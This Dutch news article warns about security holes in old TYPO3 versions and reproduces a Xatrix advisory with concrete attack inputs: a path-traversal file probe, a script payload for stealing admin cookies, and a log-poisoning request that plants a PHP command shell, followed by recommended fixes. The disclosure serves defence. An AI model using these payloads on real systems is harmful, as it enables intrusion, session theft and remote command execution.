Oude versies TYPO3 onveilig

De TYPO3 Association had het al eind vorig jaar aangegeven dat oudere versies van TYPO3 onveilig zijn. De openbaarmaking van de specifieke onveiligheden en risico's werden echter niet duidelijk gemaakt. TYPOTycoon ging op onderzoek.

Alle versies ouder en gelijk aan TYPO3 v.3.8.0 zijn onveilig

Op veel sites draaien nog steeds TYPO3 versies ouder dan versie 3.8.0. Een onderzoek onder de verschillende websites wereldwijd leerde ons dat er zelfs een groot aantal TYPO3 versies 3.5 bestaan. Uit het zogenaamde TYPO3 vulnerabilities rapport blijkt dat er op diverse vlakken lichte tot zware lekken aanwezig zijn. Een aantal daarvan zijn relatief eenvoudig op server niveau op te lossen. Anderen daarentegen vergen toch echt wel de upgrade.

Hieronder is een overzicht van deze vulnerabilities zoals omschreven op Xatrix.com.

0) CLIENT-SIDE DATA-OBFUSCATION

form-fields are obfuscated using client-side java-script routines.
after the fields are joined a java-script creates MD5-hashes and
submits the form.

examples: index.php (account-data), showpic.php(name-checksum)

attached perl-scripts (typo.pl/showpic.pl) demonstrate how to circumvent
this protection.


1) PATH-DISCLOSURE

several test-, class- and library-scripts can be found within webroot.
some of them can be forced to produce runtime errors and output their
physical path.

example: /fileadmin/include_test.php


2) PROOF OF FILE-EXISTENCE

"showpic.php" and "thumbs.php" allow an attacker to check the existense of
arbitrary files.

combined with file-enumeration methods it is possible to reconstruct parts
of the directory- and filesystem - structure.

example on howto check for existing files with attached perl-script "showpic.pl":
---*---
sh> showpic.pl localhost '../../../../../../../../../../etc/hosts'
../../../../../../../../../../etc/hosts exists
---*---


3) CROSS SITE SCRIPTING / COOKIE-THEFT

all system and login-errors are saved in the typo3-database.
administrators can view all the erroneous data.

since this data is not being checked for XSS-content it is possible to include
client-side script(java-script)-tags in these entries.

every time the admins view their logs these scripts will be run on the admins
web-browser which leads to a typical XSS-bug.

thus making it possible to steal the admins-cookies or let him open a new
user-account without his knowledge.


example with the attached "typo.pl" - perlscript:

---*---
sh> typo.pl localhost '><script>alert(document.cookie)</script><:aaa'
---*---

viewing the logfiles will execute the script.


4) ARBITRARY FILE-RETRIEVAL

the "dev/translations.php" - script does not check the
ONLY-parameter for malicious values.

a relative path combined with a Nullbyte lead to the inclusion of the
given file.

example http-request:
---*---
GET host/dev/translations.php
---*---


5) ARBITRARY COMMAND EXECUTION

extends vulnerability number 4):

if the included file contains php-source code it will be executed.
thus allowing an attacker to execute operating-system commands and
at long sight escalate his privileges.

example:
---*---

a file for placing our malicious php-source is needed.
if there is no file we have write-access we still can use the websevers-logfiles.

the following http-request:
---cut---
localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
---cut---

creates this entry:

---cut---
[Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/<? `echo '<?passthru($c
)?>' >> ./x.php` ?>
---cut---

in a typicall apache - error_log file.

using the method discussed under 4) the following http-request:

---cut---
localhost/typo3/typo3/dev/translations.php'
---cut---

will include the apach error_log in our output and execute our php-commands.
as a result we will find x.php in our "/dev" directory.

x.php:
---cut---
<?passthru($c)?>
---cut---

---*---


6) SCRIPTS AND DIRECTORIES IN WEBROOT

a couple of scripts, libraries, files and directories can be found within typo3s
webroot.

"/install" is improper protected and vulnerable to brute-force attacks.
"/fileadmin" directory reveals log-files and demo-scripts
"/typo3conf" directory contains the localconf.php,database.sql and other sensitive files


=======
Remarks
=======

the serious vulnerabilities rely on the "/dev" (developer?) - directory.
scripts within this directory can be found in many/most production-environments!


====================
Recommended Hotfixes
====================
overall) install the new Version !

or

1) remove "/install" directory
2) remove "/dev" directory
3) Choose strong administrator-passwords
4) showpic.php and thumbs.php must be patched.
5) remove all demo-directories and protect "/fileadmin" and "/typo3conf"

Gerelateerd nieuws: